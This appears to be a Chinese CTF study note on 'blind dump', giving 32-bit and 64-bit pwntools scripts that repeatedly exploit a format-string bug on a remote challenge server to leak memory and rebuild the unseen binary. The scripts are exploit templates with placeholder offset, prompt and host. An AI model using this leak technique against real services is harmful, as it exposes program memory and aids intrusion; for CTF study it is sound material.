blind dump

blind dump

主要用于没有提供二进制文件、只有靶机的题目:如果检测出存在格式化字符串漏洞,就可以利用盲打脚本还原二进制文件,从而进行漏洞利用。

主要是32位和64位的脚本

32位:

#! /usr/bin/env python 
# -*- coding: utf-8 -*- 
from pwn import *
import binascii
 
 
# Connection to the challenge service. remote() is left without arguments on
# the page, so this line is a template: pwntools' remote() expects the host and
# port of the CTF target machine.
r = remote()
 
 
def leak(addr):
    """Send one format-string read for ``addr`` and return the echoed bytes.

    The payload is a ``%k$s`` directive, the ``.dump`` end marker and the
    packed 32-bit address. The reply is read up to ``.dump`` and returned
    without the marker.

    NOTE(review): ``%k$s`` and ``'xxxx'`` are placeholders on the page, not
    working values. The block is Python 2 (print statements, str payloads).
    """
    payload = "%k$s.dump" + p32(addr) # k is a placeholder: it depends on the argument offset found while debugging
    r.sendline(payload)
    print "leaking:", hex(addr)
    r.recvuntil('xxxx')  # 'xxxx' stands in for the text that precedes the echoed data -- presumably challenge-specific
    ret = r.recvuntil(".dump",drop=True)
    print "ret:", binascii.hexlify(ret), len(ret)
    remain = r.recvrepeat(0.2)  # drains whatever else arrives within 0.2 s; the value is never used
    return ret
 
 
 
# Dump loop: starting at `begin`, append whatever each leak() call returns and
# advance the address by the same number of bytes.
begin = 0x8048000
text_seg = ''
try:
    while True:
        ret = leak(begin)
        # An empty reply is recorded as a single NUL byte, so the dump and the
        # address always move forward together.
        piece = ret if ret else '\x00'
        text_seg += piece
        begin += len(piece)
except Exception as e:
    # Any error ends the loop; it is only printed, not re-raised.
    print e
finally:
    # Whatever was collected so far is written out, even after a failure.
    print '[+]',len(text_seg)
    with open('dump_bin','wb') as f:
        f.write(text_seg)

64位

import os
import sys
import time
from pwn import *
from ctypes import *
import binascii
# Start address of the dump and the accumulator for the recovered bytes.
begin=0x400000
# NOTE(review): this name shadows the builtin bin() for the rest of the script.
bin = b''
# Shorthand wrappers around the pwntools tube `p` (assigned below). None of
# them is called by the dump code on this page.
# NOTE(review): the send wrappers pass their arguments through str(); on
# Python 3 a bytes argument would turn into its "b'...'" repr -- confirm
# before reusing them.
s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
r       = lambda num                :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
itr     = lambda                    :p.interactive()
# Pad short reads with NUL bytes to 4 / 8 bytes before unpacking them.
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
# NOTE(review): this logging helper is rebound by `def leak(addr)` further
# down in the script, so it is unreachable after that point.
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
# Read up to a "\x7f" / "\xf7" byte and unpack the last 6 / 4 bytes received.
l64     = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
l32     = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,b"\x00"))
# Connection to the challenge service; remote() is left without host and port
# on the page, so this line is a template.
p=remote()
#context(log_level='debug')
def leak(addr):
    """Send one format-string read for ``addr`` and return the echoed bytes.

    The payload is a ``%k$s`` directive, the ``dump`` end marker and the
    packed 64-bit address. It is sent after the ``'xxxx'`` prompt, output up
    to ``':'`` is discarded, and the bytes before ``dump`` are returned.

    NOTE(review): ``%k$s`` and ``'xxxx'`` are placeholders on the page, not
    working values.
    """
    pl=b"%k$sdump"+p64(addr)    # as in the 32-bit script, k is a placeholder fixed by the argument offset
    print(pl)
    p.sendlineafter('xxxx',pl)  # 'xxxx' stands in for the service prompt -- presumably challenge-specific
    p.recvuntil(':')
    data=p.recvuntil('dump',drop=True)
    #data = p.recvrepeat(0.2)
    return data

# Dump loop: starting at `begin`, append whatever each leak() call returns and
# advance the address by the same number of bytes.
try:
    while True:
        data = leak(begin)
        # An empty reply is recorded as a single NUL byte, so the dump and the
        # address always move forward together.
        chunk = data if data else b'\x00'
        bin += chunk
        begin += len(chunk)
except Exception as e:
    # Any error ends the loop; it is only printed, not re-raised.
    print(e)
finally:
    # Whatever was collected so far is written out, even after a failure.
    print('[+]', len(bin))
    with open('dump_bin_64', 'wb') as f:
        f.write(bin)

# Hand the connection over to the terminal once the dump has been saved.
p.interactive()

核心是循环调用一个利用格式化字符串漏洞的函数,从起始地址开始泄露二进制文件的地址及内容,最后整理成二进制文件保存,会用就行。使用条件包括但不限于上文所述,另外还要求靶机本身可以不断循环等等。这类题目实际上可能已经没有了,看会不会在比赛里出现吧。
